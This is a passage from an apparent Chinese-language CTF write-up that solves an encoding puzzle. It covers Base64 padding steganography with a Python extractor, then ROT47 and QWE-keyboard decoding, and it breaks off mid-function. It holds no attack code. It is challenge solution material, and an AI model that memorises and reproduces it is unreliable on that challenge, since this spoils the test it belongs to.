SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Px==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P5==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Px==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P3==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P9==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P3==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P9==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P3==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P+==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P+==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P4==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Px==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P1==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P+==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P2==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P9==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P5==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD/=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD+=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD8=
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0Pw==
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
SXMgdGhpcyB0aGUgcGFzc3dvcmQ/IFRoaXMgaXMgbm90IGEgcGFzc3dvcmQsIGlzIGl0P0lzIHRoaXMgdGhlIHBhc3N3b3JkPyBUaGlzIGlzIG5vdCBhIHBhc3N3b3JkLCBpcyBpdD9JcyB0aGlzIHRoZSBwYXNzd29yZD8gVGhpcyBpcyBub3QgYSBwYXNzd29yZCwgaXMgaXQ/
"""

# Base64 字符表
b64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

bin_str = ""

for line in encoded_lines.splitlines():
    line = line.strip()
    if not line:
        continue
    
    # 提取隐藏位
    if line.endswith("=="):
        # 结尾是 ==,取出倒数第 3 个字符,它的最后 4 位是隐藏信息
        char = line[-3]
        val = b64_chars.index(char)
        bin_str += format(val, '06b')[-4:]
    elif line.endswith("="):
        # 结尾是 =,取出倒数第 2 个字符,它的最后 2 位是隐藏信息
        char = line[-2]
        val = b64_chars.index(char)
        bin_str += format(val, '06b')[-2:]

# 将二进制转为字符
flag = ""
for i in range(0, len(bin_str), 8):
    byte = bin_str[i:i+8]
    if len(byte) == 8:
        flag += chr(int(byte, 2))

print("Flag:", flag)

运行可以得到

xmb2.png

1
Flag: L`__^``b^``f^```^`_`NL`_a^`a_^`__^``h^``e^`_fN

Base64 隐写解密得到一堆奇怪的字符组合,极大概率指向了 ROT47 加密。可以知道在 CTF 中,如果看到字符串里大量包含 _^、```、?] 等 ASCII 33 (!) 到 126 (~) 之间的符号,通常是 ROT47(它是 ROT13 的升级版,覆盖了所有可见字符)。再根据题目提示

xmb3.png

所以可以得到下面这个思路链条

  1. 第一层:Base64 隐写 -> 得到

    1
    L`__^``b^``f^```^`_`NL`_a^`a_^`__^``h^``e^`_fN

  2. 第二层:ROT47 -> 将上述乱码还原为可读(或半可读)的字符串。

  3. 第三层:键盘密码 (Keyboard/QWE) -> 将 ROT47 的结果在键盘上还原为 Flag。

所以接着写一个python脚本来进行解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import base64

# ================= 1. 输入数据 =================
# base64隐写解密字符
stego_result = "L`__^``b^``f^```^`_`NL`_a^`a_^`__^``h^``e^`_fN"

# ================= 2. 解密工具函数 =================

def rot47_decode(text):
    """
    ROT47 解密:对 ASCII 33-126 之间的字符进行位移
    """
    res = []
    for char in text:
        val = ord(char)
        if 33 <= val <= 126:
            res.append(chr(33 + ((val - 33 + 47) % 94)))
        else:
            res.append(char)
    return "".join(res)

def keyboard_decode(ciphertext):
    """
    QWE 键盘解密 (Cipher -> Plain)
    看着键盘按:看到 q 就当成 a
    """
    # 键盘顺序 (Cipher)
    key_order = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
    # 字母表顺序 (Plain)
    alphabet  = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    
    decoded = ""
    for char in ciphertext:
        if char in key_order:
            index = key_order.index(char)
            decoded += alphabet[index]
        else:
            decoded += char
    return decoded

def phone_keypad_decode(text):
    """
    尝试九宫格键盘解密 (针对数字)
